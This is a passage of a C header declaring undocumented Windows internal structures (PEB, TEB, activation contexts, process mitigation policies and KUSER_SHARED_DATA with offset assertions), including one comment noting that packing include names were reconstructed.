    ULONG ImageSubsystemMinorVersion;
    KAFFINITY ActiveProcessAffinityMask;
    GDI_HANDLE_BUFFER GdiHandleBuffer;
    PVOID PostProcessInitRoutine;
    PVOID TlsExpansionBitmap;
    ULONG TlsExpansionBitmapBits[32];
    ULONG SessionId;
    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    PVOID pShimData;
    PVOID AppCompatInfo;
    UNICODE_STRING CSDVersion;
    PACTIVATION_CONTEXT_DATA ActivationContextData;
    PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;
    PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;
    PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;
    SIZE_T MinimumStackCommit;
    PVOID SparePointers[2];
    PVOID PatchLoaderData;
    PVOID ChpeV2ProcessInfo;
    ULONG AppModelFeatureState;
    ULONG SpareUlongs[2];
    USHORT ActiveCodePage;
    USHORT OemCodePage;
    USHORT UseCaseMapping;
    USHORT UnusedNlsField;
    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;
    union {
        PVOID pContextData;
        PVOID pUnused;
        PVOID EcCodeBitMap;
    };
    PVOID pImageHeaderHash;
    union {
        ULONG TracingFlags;
        struct {
            ULONG HeapTracingEnabled : 1;
            ULONG CritSecTracingEnabled : 1;
            ULONG LibLoaderTracingEnabled : 1;
            ULONG SpareTracingBits : 29;
        };
    };
    ULONGLONG CsrServerReadOnlySharedMemoryBase;
    PRTL_CRITICAL_SECTION TppWorkerpListLock;
    LIST_ENTRY TppWorkerpList;
    PVOID WaitOnAddressHashTable[128];
    PVOID TelemetryCoverageHeader; // RS3
    ULONG CloudFileFlags;
    ULONG CloudFileDiagFlags; // RS4
    CHAR PlaceholderCompatibilityMode;
    CHAR PlaceholderCompatibilityModeReserved[7];
    struct _LEAP_SECOND_DATA* LeapSecondData; // RS5
    union {
        ULONG LeapSecondFlags;
        struct {
            ULONG SixtySecondEnabled : 1;
            ULONG Reserved : 31;
        };
    };
    ULONG NtGlobalFlag2;
    ULONGLONG ExtendedFeatureDisableMask; // since WIN11
} PEB, * PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
    ULONG Flags;
    PCSTR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;

typedef struct _TEB_ACTIVE_FRAME {
    ULONG Flags;
    struct _TEB_ACTIVE_FRAME *Previous;
    PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;

#define GDI_BATCH_BUFFER_SIZE 310

typedef struct _GDI_TEB_BATCH {
    ULONG Offset;
    UCHAR Alignment[4];
    ULONG_PTR HDC;
    ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH, *PGDI_TEB_BATCH;

typedef struct _ACTIVATION_CONTEXT_DATA {
    ULONG Magic; //'xtcA'
    ULONG HeaderSize;
    ULONG FormatVersion;
    ULONG TotalSize;
    ULONG DefaultTocOffset;
    ULONG ExtendedTocOffset;
    ULONG AssemblyRosterOffset;
    ULONG Flags;
} ACTIVATION_CONTEXT_DATA, *PACTIVATION_CONTEXT_DATA;

typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {
    ULONG Flags;
    UNICODE_STRING DosPath;
    HANDLE Handle;
} ASSEMBLY_STORAGE_MAP_ENTRY, *PASSEMBLY_STORAGE_MAP_ENTRY;

typedef struct _ASSEMBLY_STORAGE_MAP {
    ULONG Flags;
    ULONG AssemblyCount;
    PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;
} ASSEMBLY_STORAGE_MAP, *PASSEMBLY_STORAGE_MAP;

typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(
    _In_ ULONG NotificationType,
    _In_ struct _ACTIVATION_CONTEXT* ActivationContext,
    _In_ PACTIVATION_CONTEXT_DATA ActivationContextData,
    _In_opt_ PVOID NotificationContext,
    _In_opt_ PVOID NotificationData,
    _Inout_ PBOOLEAN DisableThisNotification
    );

typedef struct _ACTIVATION_CONTEXT {
    ULONG RefCount;
    ULONG Flags;
    LIST_ENTRY Links;
    ACTIVATION_CONTEXT_DATA* ActivationContextData;
    PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;
    PVOID NotificationContext;
    ULONG SendNotifications[4];
    ULONG DisabledNotifications[4];
    ASSEMBLY_STORAGE_MAP StorageMap;
    ASSEMBLY_STORAGE_MAP_ENTRY* InlineStorageMapEntries;
    ULONG StackTraceIndex;
    PVOID StackTraces[4][4];
} ACTIVATION_CONTEXT, *PACTIVATION_CONTEXT;

typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
    struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
    PACTIVATION_CONTEXT ActivationContext;
    ULONG Flags;
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;

typedef struct _ACTIVATION_CONTEXT_STACK {
    PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
    LIST_ENTRY FrameListCache;
    ULONG Flags;
    ULONG NextCookieSequenceNumber;
    ULONG StackId;
} ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;

typedef struct _TEB {
    NT_TIB NtTib;
    PVOID EnvironmentPointer;
    CLIENT_ID ClientId;
    PVOID ActiveRpcHandle;
    PVOID ThreadLocalStoragePointer;
    PPEB ProcessEnvironmentBlock;
    ULONG LastErrorValue;
    ULONG CountOfOwnedCriticalSections;
    PVOID CsrClientThread;
    PVOID Win32ThreadInfo;
    ULONG User32Reserved[26];
    ULONG UserReserved[5];
    PVOID WOW32Reserved;
    LCID CurrentLocale;
    ULONG FpSoftwareStatusRegister;
    PVOID ReservedForDebuggerInstrumentation[16];
#ifdef _WIN64
    PVOID SystemReserved1[30];
#else
    PVOID SystemReserved1[26];
#endif
    CHAR PlaceholderCompatibilityMode;
    BOOLEAN PlaceholderHydrationAlwaysExplicit;
    CHAR PlaceholderReserved[10];
    ULONG ProxiedProcessId;
    ACTIVATION_CONTEXT_STACK ActivationStack;
    UCHAR WorkingOnBehalfTicket[8];
    NTSTATUS ExceptionCode;
    PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
    ULONG_PTR InstrumentationCallbackSp;
    ULONG_PTR InstrumentationCallbackPreviousPc;
    ULONG_PTR InstrumentationCallbackPreviousSp;
#ifdef _WIN64
    ULONG TxFsContext;
#endif
    BOOLEAN InstrumentationCallbackDisabled;
#ifdef _WIN64
    BOOLEAN UnalignedLoadStoreExceptions;
#endif
#ifndef _WIN64
    UCHAR SpareBytes[23];
    ULONG TxFsContext;
#endif
    GDI_TEB_BATCH GdiTebBatch;
    CLIENT_ID RealClientId;
    HANDLE GdiCachedProcessHandle;
    ULONG GdiClientPID;
    ULONG GdiClientTID;
    PVOID GdiThreadLocalInfo;
    ULONG_PTR Win32ClientInfo[62];
    PVOID glDispatchTable[233];
    ULONG_PTR glReserved1[29];
    PVOID glReserved2;
    PVOID glSectionInfo;
    PVOID glSection;
    PVOID glTable;
    PVOID glCurrentRC;
    PVOID glContext;
    NTSTATUS LastStatusValue;
    UNICODE_STRING StaticUnicodeString;
    WCHAR StaticUnicodeBuffer[261];
    PVOID DeallocationStack;
    PVOID TlsSlots[64];
    LIST_ENTRY TlsLinks;
    PVOID Vdm;
    PVOID ReservedForNtRpc;
    PVOID DbgSsReserved[2];
    ULONG HardErrorMode;
#ifdef _WIN64
    PVOID Instrumentation[11];
#else
    PVOID Instrumentation[9];
#endif
    GUID ActivityId;
    PVOID SubProcessTag;
    PVOID PerflibData;
    PVOID EtwTraceData;
    PVOID WinSockData;
    ULONG GdiBatchCount;
    union {
        PROCESSOR_NUMBER CurrentIdealProcessor;
        ULONG IdealProcessorValue;
        struct {
            UCHAR ReservedPad0;
            UCHAR ReservedPad1;
            UCHAR ReservedPad2;
            UCHAR IdealProcessor;
        };
    };
    ULONG GuaranteedStackBytes;
    PVOID ReservedForPerf;
    PVOID ReservedForOle; // tagSOleTlsData
    ULONG WaitingOnLoaderLock;
    PVOID SavedPriorityState;
    ULONG_PTR ReservedForCodeCoverage;
    PVOID ThreadPoolData;
    PVOID* TlsExpansionSlots;
#ifdef _WIN64
    PVOID DeallocationBStore;
    PVOID BStoreLimit;
#endif
    ULONG MuiGeneration;
    ULONG IsImpersonating;
    PVOID NlsCache;
    PVOID pShimData;
    ULONG HeapData;
    HANDLE CurrentTransactionHandle;
    PTEB_ACTIVE_FRAME ActiveFrame;
    PVOID FlsData;
    PVOID PreferredLanguages;
    PVOID UserPrefLanguages;
    PVOID MergedPrefLanguages;
    ULONG MuiImpersonation;
    union {
        USHORT CrossTebFlags;
        USHORT SpareCrossTebBits : 16;
    };
    union {
        USHORT SameTebFlags;
        struct {
            USHORT SafeThunkCall : 1;
            USHORT InDebugPrint : 1;
            USHORT HasFiberData : 1;
            USHORT SkipThreadAttach : 1;
            USHORT WerInShipAssertCode : 1;
            USHORT RanProcessInit : 1;
            USHORT ClonedThread : 1;
            USHORT SuppressDebugMsg : 1;
            USHORT DisableUserStackWalk : 1;
            USHORT RtlExceptionAttached : 1;
            USHORT InitialThread : 1;
            USHORT SessionAware : 1;
            USHORT LoadOwner : 1;
            USHORT LoaderWorker : 1;
            USHORT SkipLoaderInit : 1;
            USHORT SkipFileAPIBrokering : 1;
        };
    };
    PVOID TxnScopeEnterCallback;
    PVOID TxnScopeExitCallback;
    PVOID TxnScopeContext;
    ULONG LockCount;
    LONG WowTebOffset;
    PVOID ResourceRetValue;
    PVOID ReservedForWdf;
    ULONGLONG ReservedForCrt;
    GUID EffectiveContainerId;
    ULONGLONG LastSleepCounter;
    ULONG SpinCallCount;
    ULONGLONG ExtendedFeatureDisableMask;
} TEB, *PTEB;

typedef struct _PROCESS_DEVICEMAP_INFORMATION {
    union {
        struct {
            HANDLE DirectoryHandle;
        } Set;
        struct {
            ULONG DriveMap;
            UCHAR DriveType[32];
        } Query;
    };
} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION;

__inline struct _PEB * NtCurrentPeb()
{
    return NtCurrentTeb()->ProcessEnvironmentBlock;
}

/*
** PEB/TEB END
*/

/*
** MITIGATION POLICY START
*/

//redefine enum
#define ProcessDEPPolicy 0
#define ProcessASLRPolicy 1
#define ProcessDynamicCodePolicy 2
#define ProcessStrictHandleCheckPolicy 3
#define ProcessSystemCallDisablePolicy 4
#define ProcessMitigationOptionsMask 5
#define ProcessExtensionPointDisablePolicy 6
#define ProcessControlFlowGuardPolicy 7
#define ProcessSignaturePolicy 8
#define ProcessFontDisablePolicy 9
#define ProcessImageLoadPolicy 10
#define ProcessSystemCallFilterPolicy 11
#define ProcessPayloadRestrictionPolicy 12
#define ProcessChildProcessPolicy 13
#define ProcessSideChannelIsolationPolicy 14
#define ProcessUserShadowStackPolicy 15
#define ProcessRedirectionTrustPolicy 16
#define ProcessUserPointerAuthPolicy 17
#define ProcessSEHOPPolicy 18

typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD MicrosoftSignedOnly : 1;
            DWORD StoreSignedOnly : 1;
            DWORD MitigationOptIn : 1;
            DWORD AuditMicrosoftSignedOnly : 1;
            DWORD AuditStoreSignedOnly : 1;
            DWORD ReservedFlags : 27;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD ProhibitDynamicCode : 1;
            DWORD AllowThreadOptOut : 1;
            DWORD AllowRemoteDowngrade : 1;
            DWORD AuditProhibitDynamicCode : 1;
            DWORD ReservedFlags : 28;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD EnableControlFlowGuard : 1;
            DWORD EnableExportSuppression : 1;
            DWORD StrictMode : 1;
            DWORD EnableXfg : 1;
            DWORD EnableXfgAuditMode : 1;
            DWORD ReservedFlags : 27;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD DisableNonSystemFonts : 1;
            DWORD AuditNonSystemFontLoading : 1;
            DWORD ReservedFlags : 30;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD NoRemoteImages : 1;
            DWORD NoLowMandatoryLabelImages : 1;
            DWORD PreferSystem32Images : 1;
            DWORD AuditNoRemoteImages : 1;
            DWORD AuditNoLowMandatoryLabelImages : 1;
            DWORD ReservedFlags : 27;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, *PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 {
    union {
        ULONG Flags;
        struct {
            ULONG FilterId : 4;
            ULONG ReservedFlags : 28;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 {
    union {
        ULONG Flags;
        struct {
            ULONG EnableExportAddressFilter : 1;
            ULONG AuditExportAddressFilter : 1;
            ULONG EnableExportAddressFilterPlus : 1;
            ULONG AuditExportAddressFilterPlus : 1;
            ULONG EnableImportAddressFilter : 1;
            ULONG AuditImportAddressFilter : 1;
            ULONG EnableRopStackPivot : 1;
            ULONG AuditRopStackPivot : 1;
            ULONG EnableRopCallerCheck : 1;
            ULONG AuditRopCallerCheck : 1;
            ULONG EnableRopSimExec : 1;
            ULONG AuditRopSimExec : 1;
            ULONG ReservedFlags : 20;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
    union {
        ULONG Flags;
        struct {
            ULONG NoChildProcessCreation : 1;
            ULONG AuditNoChildProcessCreation : 1;
            ULONG AllowSecureProcessCreation : 1;
            ULONG ReservedFlags : 29;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD SmtBranchTargetIsolation : 1;
            DWORD IsolateSecurityDomain : 1;
            DWORD DisablePageCombine : 1;
            DWORD SpeculativeStoreBypassDisable : 1;
            DWORD ReservedFlags : 28;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD DisallowWin32kSystemCalls : 1;
            DWORD AuditDisallowWin32kSystemCalls : 1;
            DWORD DisallowFsctlSystemCalls : 1;
            DWORD AuditDisallowFsctlSystemCalls : 1;
            DWORD ReservedFlags : 28;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD EnableUserShadowStack : 1;
            DWORD AuditUserShadowStack : 1;
            DWORD SetContextIpValidation : 1;
            DWORD AuditSetContextIpValidation : 1;
            DWORD EnableUserShadowStackStrictMode : 1;
            DWORD BlockNonCetBinaries : 1;
            DWORD BlockNonCetBinariesNonEhcont : 1;
            DWORD AuditBlockNonCetBinaries : 1;
            DWORD CetDynamicApisOutOfProcOnly : 1;
            DWORD ReservedFlags : 23;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, *PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;

typedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {
    union {
        DWORD Flags;
        struct {
            DWORD EnforceRedirectionTrust : 1;
            DWORD AuditRedirectionTrust : 1;
            DWORD ReservedFlags : 30;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, *PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;

typedef struct _PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 {
    union {
        ULONG Flags;
        struct {
            ULONG EnablePointerAuthUserIp : 1;
            ULONG ReservedFlags : 31;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11, *PPROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11;

typedef struct _PROCESS_MITIGATION_SEHOP_POLICY_W11 {
    union {
        ULONG Flags;
        struct {
            ULONG EnableSehop : 1;
            ULONG ReservedFlags : 31;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_SEHOP_POLICY_W11, *PPROCESS_MITIGATION_SEHOP_POLICY_W11;

typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
    PROCESS_MITIGATION_POLICY Policy;
    union {
        PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;
        PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;
        PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy;
        PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;
        PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;
        PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;
        PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy;
        PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy;
        PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy;
        PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;
        PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;
        PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
        PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;
        PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;
        PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;
        PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 UserPointerAuthPolicy;
        PROCESS_MITIGATION_SEHOP_POLICY_W11 SEHOPPolicy;
    };
} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;

/*
** MITIGATION POLICY END
*/

/*
** KUSER_SHARED_DATA START
*/

#define NX_SUPPORT_POLICY_ALWAYSOFF 0
#define NX_SUPPORT_POLICY_ALWAYSON 1
#define NX_SUPPORT_POLICY_OPTIN 2
#define NX_SUPPORT_POLICY_OPTOUT 3

#define SEH_VALIDATION_POLICY_ON 0
#define SEH_VALIDATION_POLICY_OFF 1
#define SEH_VALIDATION_POLICY_TELEMETRY 2
#define SEH_VALIDATION_POLICY_DEFER 3

/* assumed: the packing header names below were missing from the page; pack(4) push/pop
   is consistent with the __alignof(KSYSTEM_TIME) and FIELD_OFFSET checks that follow */
#include <pshpack4.h>
typedef struct _KSYSTEM_TIME {
    ULONG LowPart;
    LONG High1Time;
    LONG High2Time;
} KSYSTEM_TIME, *PKSYSTEM_TIME;
#include <poppack.h>

typedef enum _NT_PRODUCT_TYPE {
    NtProductWinNt = 1,
    NtProductLanManNt,
    NtProductServer
} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;

#define PROCESSOR_FEATURE_MAX 64

typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {
    StandardDesign, // None == 0 == standard design
    NEC98x86,       // NEC PC98xx series on X86
    EndAlternatives // past end of known alternatives
} ALTERNATIVE_ARCHITECTURE_TYPE;

//
// Define Address of User Shared Data
//
#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000

//
// WARNING: this definition is OS version dependent.
// Structure maybe incomplete.
//
#include <pshpack4.h>
typedef struct _KUSER_SHARED_DATA {
    ULONG TickCountLowDeprecated;
    ULONG TickCountMultiplier;
    volatile KSYSTEM_TIME InterruptTime;
    volatile KSYSTEM_TIME SystemTime;
    volatile KSYSTEM_TIME TimeZoneBias;
    USHORT ImageNumberLow;
    USHORT ImageNumberHigh;
    WCHAR NtSystemRoot[260];
    ULONG MaxStackTraceDepth;
    ULONG CryptoExponent;
    ULONG TimeZoneId;
    ULONG LargePageMinimum;
    union {
        ULONG Reserved2[7];
        struct {
            ULONG AitSamplingValue;
            ULONG AppCompatFlag;
            struct {
                ULONG LowPart;
                ULONG HighPart;
            } RNGSeedVersion;
            ULONG GlobalValidationRunlevel;
            LONG TimeZoneBiasStamp;
            ULONG NtBuildNumber;
        };
    };
    NT_PRODUCT_TYPE NtProductType;
    BOOLEAN ProductTypeIsValid;
    UCHAR Reserved0[1];
    USHORT NativeProcessorArchitecture;
    ULONG NtMajorVersion;
    ULONG NtMinorVersion;
    BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
    ULONG Reserved1;
    ULONG Reserved3;
    volatile ULONG TimeSlip;
    ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
    ULONG BootId; //previously AltArchitecturePad
    LARGE_INTEGER SystemExpirationDate;
    ULONG SuiteMask;
    BOOLEAN KdDebuggerEnabled;
    union {
        UCHAR MitigationPolicies;
        struct {
            UCHAR NXSupportPolicy : 2;
            UCHAR SEHValidationPolicy : 2;
            UCHAR CurDirDevicesSkippedForDlls : 2;
            UCHAR Reserved : 2;
        };
    };
    UCHAR Reserved6[2];
    volatile ULONG ActiveConsoleId;
    volatile ULONG DismountCount;
    ULONG ComPlusPackage;
    ULONG LastSystemRITEventTickCount;
    ULONG NumberOfPhysicalPages;
    BOOLEAN SafeBootMode;
    UCHAR VirtualizationFlags;
    UCHAR Reserved12[2];
    union {
        ULONG SharedDataFlags;
        struct {
            ULONG DbgErrorPortPresent : 1;
            ULONG DbgElevationEnabled : 1;
            ULONG DbgVirtEnabled : 1;
            ULONG DbgInstallerDetectEnabled : 1;
            ULONG DbgLkgEnabled : 1;
            ULONG DbgDynProcessorEnabled : 1;
            ULONG DbgConsoleBrokerEnabled : 1;
            ULONG DbgSecureBootEnabled : 1;
            ULONG DbgMultiSessionSku : 1;
            ULONG DbgMultiUsersInSessionSku : 1;
            ULONG DbgStateSeparationEnabled : 1;
            ULONG DbgSplitTokenEnabled : 1;
            ULONG DbgShadowAdminEnabled : 1;
            ULONG SpareBits : 19;
        };
    };
    ULONG DataFlagsPad[1];
    ULONGLONG TestRetInstruction;
    LONGLONG QpcFrequency;
    ULONG SystemCall;
    ULONG SystemCallPad0;
    ULONGLONG SystemCallPad[2];
    union {
        volatile KSYSTEM_TIME TickCount;
        volatile ULONG64 TickCountQuad;
        struct {
            ULONG ReservedTickCountOverlay[3];
            ULONG TickCountPad[1];
        };
    };
    ULONG Cookie;
    ULONG CookiedPad[1];
    LONGLONG ConsoleSessionForegroundProcessId;
    ULONGLONG TimeUpdateLock;
    ULONGLONG BaselineSystemTimeQpc;
    ULONGLONG BaselineInterruptTimeQpc;
    ULONGLONG QpcSystemTimeIncrement;
    ULONGLONG QpcInterruptTimeIncrement;
    UCHAR QpcSystemTimeIncrementShift;
    UCHAR QpcInterruptTimeIncrementShift;
    USHORT UnparkedProcessorCount;
    ULONG EnclaveFeatureMask[4];
    union {
        ULONG Reserved8;
        ULONG TelemetryCoverageRound;
    };
    USHORT UserModeGlobalLogger[16];
    ULONG ImageFileExecutionOptions;
    ULONG LangGenerationCount;
    ULONGLONG Reserved4;
    volatile ULONG64 InterruptTimeBias;
    volatile ULONG64 QpcBias;
    ULONG ActiveProcessorCount;
    volatile UCHAR ActiveGroupCount;
    UCHAR Reserved9;
    union {
        USHORT QpcData;
        struct {
            UCHAR QpcBypassEnabled : 1;
            UCHAR QpcShift : 1;
        };
    };
    LARGE_INTEGER TimeZoneBiasEffectiveStart;
    LARGE_INTEGER TimeZoneBiasEffectiveEnd;
    XSTATE_CONFIGURATION XState;
    KSYSTEM_TIME FeatureConfigurationChangeStamp;
    ULONG Spare;
    ULONG64 UserPointerAuthMask;
    ULONG InternsReserved[210];
} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
#include <poppack.h>

#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)

#if !defined(__midl) && !defined(MIDL_PASS)
//
// The overall size can change, but it must be the same for all architectures.
//
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);
C_ASSERT(__alignof(KSYSTEM_TIME) == 4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, GlobalValidationRunlevel) == 0x258);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);
